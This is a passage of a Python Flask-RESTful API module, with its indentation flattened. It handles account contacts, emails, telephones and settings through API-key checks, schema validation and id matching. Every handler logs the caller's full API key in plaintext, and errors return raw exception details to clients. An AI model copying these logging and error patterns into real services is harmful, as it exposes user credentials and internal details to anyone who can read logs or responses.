# Collect data
try:
attributes = json_data['data']['attributes']
except Exception as exp:
error_title = "Could not collect data"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
# Update Particulars
try:
logger.info("Updating Particulars")
db_entries = update_particular(account_id=account_id, id=particulars_id, attributes=attributes)
except Exception as exp:
error_title = "No Particulars found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Particulars Updated")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
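# Illustrative sketch, not part of this module: the PATCH handler above
# requires the resource id in the URL path to match the id inside the
# JSON:API payload before any update runs; distilled (names hypothetical):
#
#     def ids_match(id_from_path, json_data):
#         return str(id_from_path) == str(json_data["data"].get("id", ""))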
class AccountContacts(Resource):
@requires_api_auth_user
def get(self, account_id):
logger.info("AccountContacts")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Contacts
try:
logger.info("Fetching Contacts")
db_entries = get_contacts(account_id=account_id)
except Exception as exp:
error_title = "No Contacts found"
logger.error(error_title + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Contacts Fetched")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
@requires_api_auth_user
def post(self, account_id):
logger.info("AccountContacts")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs from path and ApiKey are matching")
# load JSON from payload
json_data = request.get_json()
if not json_data:
error_detail = {'0': 'Set application/json as Content-Type', '1': 'Provide json payload'}
raise ApiError(code=400, title="No input data provided", detail=error_detail, source=endpoint)
else:
logger.debug("json_data: " + json.dumps(json_data))
# Validate payload content
schema = ContactsSchema()
schema_validation_result = schema.load(json_data)
# Check validation errors
if schema_validation_result.errors:
logger.error("Invalid payload")
raise ApiError(code=400, title="Invalid payload", detail=dict(schema_validation_result.errors),
source=endpoint)
else:
logger.debug("JSON validation -> OK")
# Collect data
try:
attributes = json_data['data']['attributes']
except Exception as exp:
error_title = "Could not collect data"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
# Add Contact
try:
logger.info("Adding Contacts")
db_entries = add_contact(account_id=account_id, attributes=attributes)
except Exception as exp:
error_title = "Could not add Contact entry"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Contacts Updated")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=201)
class AccountContact(Resource):
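"""
Account API resource for a single Contact entry of an Account.

GET fetches the entry identified by contacts_id via get_contact().
PATCH validates the payload with ContactsSchemaForUpdate, requires the
payload id to match contacts_id from the path and updates the entry via
update_contact().

Illustrative payload shape for PATCH:
{"data": {"id": "<contacts_id>", "attributes": {...}}}
"""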
@requires_api_auth_user
def get(self, account_id, contacts_id):
logger.info("AccountContact")
try:
endpoint = str(api.url_for(self, account_id=account_id, contacts_id=contacts_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
contacts_id = str(contacts_id)
except Exception as exp:
error_title = "Unsupported contacts_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("contacts_id: " + contacts_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Contact
try:
logger.info("Fetching Contact")
db_entries = get_contact(account_id=account_id, id=contacts_id)
except Exception as exp:
error_title = "No Contact found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Contact Fetched")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
@requires_api_auth_user
def patch(self, account_id, contacts_id):
logger.info("AccountContact")
try:
endpoint = str(api.url_for(self, account_id=account_id, contacts_id=contacts_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
contacts_id = str(contacts_id)
except Exception as exp:
error_title = "Unsupported contacts_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("contacts_id: " + contacts_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs from path and ApiKey are matching")
# load JSON from payload
json_data = request.get_json()
if not json_data:
error_detail = {'0': 'Set application/json as Content-Type', '1': 'Provide json payload'}
raise ApiError(code=400, title="No input data provided", detail=error_detail, source=endpoint)
else:
logger.debug("json_data: " + json.dumps(json_data))
# Validate payload content
schema = ContactsSchemaForUpdate()
schema_validation_result = schema.load(json_data)
# Check validation errors
if schema_validation_result.errors:
logger.error("Invalid payload")
raise ApiError(code=400, title="Invalid payload", detail=dict(schema_validation_result.errors), source=endpoint)
else:
logger.debug("JSON validation -> OK")
try:
contacts_id_from_payload = json_data['data'].get("id", "")
except Exception as exp:
error_title = "Could not get id from payload"
logger.error(error_title)
raise ApiError(
code=404,
title=error_title,
detail=repr(exp),
source=endpoint
)
# Check if contacts_id from path and payload are matching
if contacts_id != contacts_id_from_payload:
error_title = "Contact IDs from path and payload are not matching"
compared_ids = {'IdFromPath': contacts_id, 'IdFromPayload': contacts_id_from_payload}
logger.error(error_title + ", " + json.dumps(compared_ids))
raise ApiError(
code=403,
title=error_title,
detail=compared_ids,
source=endpoint
)
else:
logger.info("Contact IDs from path and payload are matching")
# Collect data
try:
attributes = json_data['data']['attributes']
except Exception as exp:
error_title = "Could not collect data"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
# Update Contact
try:
logger.info("Updating Contacts")
db_entries = update_contact(account_id=account_id, id=contacts_id, attributes=attributes)
except Exception as exp:
error_title = "No Contacts found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Contacts Updated")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountEmails(Resource):
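"""
Account API resource for the Email entries of an Account.

GET lists all Email entries of account_id via get_emails().
POST validates the payload with EmailsSchema and adds a new entry via
add_email(), responding with status 201.
"""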
@requires_api_auth_user
def get(self, account_id):
logger.info("AccountEmails")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Emails
try:
logger.info("Fetching Emails")
db_entries = get_emails(account_id=account_id)
except Exception as exp:
error_title = "No Emails found"
logger.error(error_title + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Emails Fetched")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
@requires_api_auth_user
def post(self, account_id):
logger.info("AccountEmails")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs from path and ApiKey are matching")
# load JSON from payload
json_data = request.get_json()
if not json_data:
error_detail = {'0': 'Set application/json as Content-Type', '1': 'Provide json payload'}
raise ApiError(code=400, title="No input data provided", detail=error_detail, source=endpoint)
else:
logger.debug("json_data: " + json.dumps(json_data))
# Validate payload content
schema = EmailsSchema()
schema_validation_result = schema.load(json_data)
# Check validation errors
if schema_validation_result.errors:
logger.error("Invalid payload")
raise ApiError(code=400, title="Invalid payload", detail=dict(schema_validation_result.errors),
source=endpoint)
else:
logger.debug("JSON validation -> OK")
# Collect data
try:
attributes = json_data['data']['attributes']
except Exception as exp:
error_title = "Could not collect data"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
# Add Email
try:
logger.info("Adding Email")
db_entries = add_email(account_id=account_id, attributes=attributes)
except Exception as exp:
error_title = "Could not add Email entry"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Email added")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=201)
class AccountEmail(Resource):
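"""
Account API resource for a single Email entry of an Account.

GET fetches the entry identified by emails_id via get_email().
PATCH validates the payload with EmailsSchemaForUpdate, requires the
payload id to match emails_id from the path and updates the entry via
update_email().
"""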
@requires_api_auth_user
def get(self, account_id, emails_id):
logger.info("AccountEmail")
try:
endpoint = str(api.url_for(self, account_id=account_id, emails_id=emails_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
emails_id = str(emails_id)
except Exception as exp:
error_title = "Unsupported emails_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("emails_id: " + emails_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Email
try:
logger.info("Fetching Email")
db_entries = get_email(account_id=account_id, id=emails_id)
except Exception as exp:
error_title = "No Email found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Email Fetched")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
@requires_api_auth_user
def patch(self, account_id, emails_id):
logger.info("AccountEmail")
try:
endpoint = str(api.url_for(self, account_id=account_id, emails_id=emails_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
emails_id = str(emails_id)
except Exception as exp:
error_title = "Unsupported emails_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("emails_id: " + emails_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs from path and ApiKey are matching")
# load JSON from payload
json_data = request.get_json()
if not json_data:
error_detail = {'0': 'Set application/json as Content-Type', '1': 'Provide json payload'}
raise ApiError(code=400, title="No input data provided", detail=error_detail, source=endpoint)
else:
logger.debug("json_data: " + json.dumps(json_data))
# Validate payload content
schema = EmailsSchemaForUpdate()
schema_validation_result = schema.load(json_data)
# Check validation errors
if schema_validation_result.errors:
logger.error("Invalid payload")
raise ApiError(code=400, title="Invalid payload", detail=dict(schema_validation_result.errors), source=endpoint)
else:
logger.debug("JSON validation -> OK")
try:
emails_id_from_payload = json_data['data'].get("id", "")
except Exception as exp:
error_title = "Could not get id from payload"
logger.error(error_title)
raise ApiError(
code=404,
title=error_title,
detail=repr(exp),
source=endpoint
)
# Check if emails_id from path and payload are matching
if emails_id != emails_id_from_payload:
error_title = "Email IDs from path and payload are not matching"
compared_ids = {'IdFromPath': emails_id, 'IdFromPayload': emails_id_from_payload}
logger.error(error_title + ", " + json.dumps(compared_ids))
raise ApiError(
code=403,
title=error_title,
detail=compared_ids,
source=endpoint
)
else:
logger.info("Email IDs from path and payload are matching")
# Collect data
try:
attributes = json_data['data']['attributes']
except Exception as exp:
error_title = "Could not collect data"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
# Update Email
try:
logger.info("Updating Emails")
db_entries = update_email(account_id=account_id, id=emails_id, attributes=attributes)
except Exception as exp:
# TODO: Error handling on more detailed level
error_title = "No Email found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Email Updated")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountTelephones(Resource):
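"""
Account API resource for the Telephone entries of an Account.

GET lists all Telephone entries of account_id via get_telephones().
POST validates the payload with TelephonesSchema and adds a new entry
via add_telephone(), responding with status 201.
"""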
@requires_api_auth_user
def get(self, account_id):
logger.info("AccountTelephones")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Telephones
try:
logger.info("Fetching Telephones")
db_entries = get_telephones(account_id=account_id)
except Exception as exp:
error_title = "No Telephones found"
logger.error(error_title + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Telephones Fetched")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
@requires_api_auth_user
def post(self, account_id):
logger.info("AccountTelephones")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs from path and ApiKey are matching")
# load JSON from payload
json_data = request.get_json()
if not json_data:
error_detail = {'0': 'Set application/json as Content-Type', '1': 'Provide json payload'}
raise ApiError(code=400, title="No input data provided", detail=error_detail, source=endpoint)
else:
logger.debug("json_data: " + json.dumps(json_data))
# Validate payload content
schema = TelephonesSchema()
schema_validation_result = schema.load(json_data)
# Check validation errors
if schema_validation_result.errors:
logger.error("Invalid payload")
raise ApiError(code=400, title="Invalid payload", detail=dict(schema_validation_result.errors),
source=endpoint)
else:
logger.debug("JSON validation -> OK")
# Collect data
try:
attributes = json_data['data']['attributes']
except Exception as exp:
error_title = "Could not collect data"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
# Add Telephone
try:
logger.info("Adding Telephone")
db_entries = add_telephone(account_id=account_id, attributes=attributes)
except Exception as exp:
error_title = "Could not add Telephone entry"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Telephone added")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=201)
class AccountTelephone(Resource):
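"""
Account API resource for a single Telephone entry of an Account.

GET fetches the entry identified by telephones_id via get_telephone().
PATCH validates the payload with TelephonesSchemaForUpdate, requires the
payload id to match telephones_id from the path and updates the entry
via update_telephone().
"""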
@requires_api_auth_user
def get(self, account_id, telephones_id):
logger.info("AccountTelephone")
try:
endpoint = str(api.url_for(self, account_id=account_id, telephones_id=telephones_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
telephones_id = str(telephones_id)
except Exception as exp:
error_title = "Unsupported telephones_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("telephones_id: " + telephones_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Telephone
try:
logger.info("Fetching Telephone")
db_entries = get_telephone(account_id=account_id, id=telephones_id)
except Exception as exp:
error_title = "No Telephone found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Telephone Fetched")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
@requires_api_auth_user
def patch(self, account_id, telephones_id):
logger.info("AccountTelephone")
try:
endpoint = str(api.url_for(self, account_id=account_id, telephones_id=telephones_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
telephones_id = str(telephones_id)
except Exception as exp:
error_title = "Unsupported telephones_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("telephones_id: " + telephones_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs from path and ApiKey are matching")
# load JSON from payload
json_data = request.get_json()
if not json_data:
error_detail = {'0': 'Set application/json as Content-Type', '1': 'Provide json payload'}
raise ApiError(code=400, title="No input data provided", detail=error_detail, source=endpoint)
else:
logger.debug("json_data: " + json.dumps(json_data))
# Validate payload content
schema = TelephonesSchemaForUpdate()
schema_validation_result = schema.load(json_data)
# Check validation errors
if schema_validation_result.errors:
logger.error("Invalid payload")
raise ApiError(code=400, title="Invalid payload", detail=dict(schema_validation_result.errors), source=endpoint)
else:
logger.debug("JSON validation -> OK")
try:
telephones_id_from_payload = json_data['data'].get("id", "")
except Exception as exp:
error_title = "Could not get id from payload"
logger.error(error_title)
raise ApiError(
code=404,
title=error_title,
detail=repr(exp),
source=endpoint
)
# Check if telephones_id from path and payload are matching
if telephones_id != telephones_id_from_payload:
error_title = "Telephone IDs from path and payload are not matching"
compared_ids = {'IdFromPath': telephones_id, 'IdFromPayload': telephones_id_from_payload}
logger.error(error_title + ", " + json.dumps(compared_ids))
raise ApiError(
code=403,
title=error_title,
detail=compared_ids,
source=endpoint
)
else:
logger.info("Telephone IDs from path and payload are matching")
# Collect data
try:
attributes = json_data['data']['attributes']
except Exception as exp:
error_title = "Could not collect data"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
# Update Telephone
try:
logger.info("Updating Telephone")
db_entries = update_telephone(account_id=account_id, id=telephones_id, attributes=attributes)
except Exception as exp:
# TODO: Error handling on more detailed level
error_title = "No Telephone found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Telephone Updated")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountSettings(Resource):
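"""
Account API resource for the Setting entries of an Account.

GET lists all Setting entries of account_id via get_settings().
POST validates the payload with SettingsSchema and adds a new entry via
add_setting(), responding with status 201.
"""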
@requires_api_auth_user
def get(self, account_id):
logger.info("AccountSettings")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Settings
try:
logger.info("Fetching Settings")
db_entries = get_settings(account_id=account_id)
except Exception as exp:
error_title = "No Settings found"
logger.error(error_title + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Settings Fetched")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
@requires_api_auth_user
def post(self, account_id):
logger.info("AccountSettings")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs from path and ApiKey are matching")
# load JSON from payload
json_data = request.get_json()
if not json_data:
error_detail = {'0': 'Set application/json as Content-Type', '1': 'Provide json payload'}
raise ApiError(code=400, title="No input data provided", detail=error_detail, source=endpoint)
else:
logger.debug("json_data: " + json.dumps(json_data))
# Validate payload content
schema = SettingsSchema()
schema_validation_result = schema.load(json_data)
# Check validation errors
